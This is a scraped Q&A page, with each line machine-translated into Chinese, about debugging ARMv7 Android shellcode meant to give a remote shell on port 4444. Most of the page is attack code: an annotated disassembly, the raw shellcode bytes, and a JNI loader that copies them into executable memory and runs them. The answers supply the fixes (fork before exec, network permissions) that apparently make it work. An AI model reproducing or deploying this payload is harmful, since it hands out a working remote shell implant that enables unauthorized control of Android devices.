堆栈内存溢出
  简体   繁体   English

Android绑定TCP shellcode - 连接被拒绝

[英]Android bind TCP shellcode - connection refused

 原文  2018-09-25 16:03:08       android/ arm/ java-native-interface/ shellcode

问题描述

My following armv7 tcp bind shell code steps: 我的以下armv7 tcp绑定shell代码步骤:

  • opens socket 打开插座
  • listen at port 4444 在4444号港口听
  • accept connections 接受联系
  • bind stdin/out/err to socket using dup2 使用dup2将stdin / out / err绑定到套接字
  • spawns shell using execve( "/system/bin/sh", NULL, NULL ) 使用execve( "/system/bin/sh", NULL, NULL )生成shell execve( "/system/bin/sh", NULL, NULL ) 
Disassembly of section .text:
_start        e28f3001  add r3, pc, #1          ; switch to thumb mode
_start+0x4    e12fff13  bx  r3
// socket(2, 1, 0)
_start+0x8    2002          movs    r0, #2
_start+0xa    2101          movs    r1, #1
_start+0xc    1a92          subs    r2, r2, r2
_start+0xe    27c8          movs    r7, #200
_start+0x10   3751          adds    r7, #81         ; r7 = 281 (socket)
_start+0x12   df01          svc 1               ; r0 = resultant sockfd
_start+0x14   1c04          adds    r4, r0, #0      ; save sockfd in r4
// connect(r0, &sockaddr, 16)
_start+0x16   a10a          add r1, pc, #40 ; (adr r1, struct)
_start+0x18   704a          strb    r2, [r1, #1]    ; write 0 for AF_INET
_start+0x1a   2210          movs    r2, #16
_start+0x1c   3702          adds    r7, #2          ; r7 = 283 (connect)
_start+0x1e   df01          svc 1
// dup2(sockfd, 0)
_start+0x20   273f          movs    r7, #63         ; r7 = 63 (dup2)
_start+0x22   1c20          adds    r0, r4, #0      ; r4 is the saved sockfd
_start+0x24   1a49          subs    r1, r1, r1      ; r1 = 0 (stdin)
_start+0x26   df01          svc 1
// dup2(sockfd, 1)
_start+0x28   1c20          adds    r0, r4, #0
_start+0x2a   2101          movs    r1, #1
_start+0x2c   df01          svc 1
// dup2(sockfd, 2)
_start+0x2e   1c20          adds    r0, r4, #0
_start+0x30   2102          movs    r1, #2
_start+0x32   df01          svc 1
// execve("/system/bin/sh", 0, 0)
_start+0x34   a004          add r0, pc, #16 ; (adr r0, binsh)
_start+0x36   1a92          subs    r2, r2, r2
_start+0x38   1a49          subs    r1, r1, r1
_start+0x3a   7382          strb    r2, [r0, #14]
_start+0x3c   270b          movs    r7, #11
_start+0x3e   df01          svc 1
// struct:
//  .ascii "\x02\xff"       // AF_INET 0xff will be NULLed
//  .ascii "\x11\x5c"       // port 4444
//  .byte 0,0,0,0       // IP Address (accept any?)
struct        5c11ff02  .word   0x5c11ff02
struct+0x4    00000000  .word   0x00000000
// .ascii "/system/bin/shX"
binsh         7379732f  .word   0x7379732f
binsh+0x4     2f6d6574  .word   0x2f6d6574
binsh+0x8     2f6e6962  .word   0x2f6e6962
binsh+0xc     6873      .short  0x6873
binsh+0xe     58        .byte   0x58

Executed via JNI 通过JNI执行 

char SC[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x92\x1a\x49\x1a\x82\x73\x0b\x27\x01\xdf\x02\xff\x11\x5c\x00\x00\x00\x00\x2f\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\x6e\x2f\x73\x68\x58\x00";

JNIEXPORT jstring JNICALL Java_com_MainActivity_run(JNIEnv *env, jobject obj) {
    char* code = mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    memcpy(code, SC, 300);
    void (*func)() = (void (*)())code;
    func();
    return (*env)->NewStringUTF(env, "hello");
}

The mmap is used to set execute permissions to the shellcode. mmap用于设置shellcode的执行权限。

In the MainActivity#onCreate I execute the native function run . 在MainActivity#onCreate中,我执行本机函数run

Debugging using gdb (v7.1) I see the shellcode. 使用gdb(v7.1)进行调试我看到了shellcode。 

gdb $ x/10i $pc
=> 0xb402a05c:  svc 1
   0xb402a05e:  nop         ; (mov r8, r8)
gdb $ n
process 8467 is executing new program: /system/bin/sh
Reading /system/bin/sh from remote target...
Reading /system/bin/sh from remote target...
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.

I'm trying to connect from my localhost using netcat and connection refused because there is no open port. 我正在尝试使用netcat从我的localhost 连接拒绝连接,因为没有开放端口。

Executing cat /proc/net/tcp shows that. 执行cat /proc/net/tcp显示了这一点。

Executing ps shows new process with "/system/bin/sh" in zombie state. 执行ps僵尸状态下显示带有“/ system / bin / sh”的新进程。 

root@androidv7:/ # ps | grep 8467                                                 
u0_a298   8467  2002  0      0     c002a898 00000000 Z sh

Do I need to replace my exec syscall with fork , exec & getpid ? 我需要用forkexecgetpid替换我的exec系统调用吗?

Any help ? 有帮助吗?

References: 参考文献:

2 个解决方案

解决方案1
 3 已采纳  2018-10-04 08:50:17

在孩子上添加fork和执行exec解决了这个问题。

解决方案2
 2  2018-09-27 22:18:56

Your shellcode is alright. 你的shellcode没问题。 Try adding permissions to your manifest: 尝试为清单添加权限: 

<uses-permission android:name="android.permission.INTERNET" /> 
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 TCP套接字连接在Android上被拒绝 - TCP socket connection refused on Android 拒绝连接:Android TCP / IP中的IOException - Connection Refused : IOException in android TCP/IP 从android tcp客户端到python tcp服务器的连接被拒绝 - Connection refused from android tcp client to python tcp server Android 连接:拒绝 - Android connection: refused Android套接字拒绝连接 - Android Socket Refused Connection Android连接在本地主机上被拒绝 - Android Connection Refused on localhost Android中的连接拒绝错误 - Connection refused error in Android 在Android上拒绝Http连接 - Http Connection Refused on Android HttpHostConnectException:连接拒绝Android - HttpHostConnectException: Connection refused Android Android客户端中的连接被拒绝 - Connection refused in Android client
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM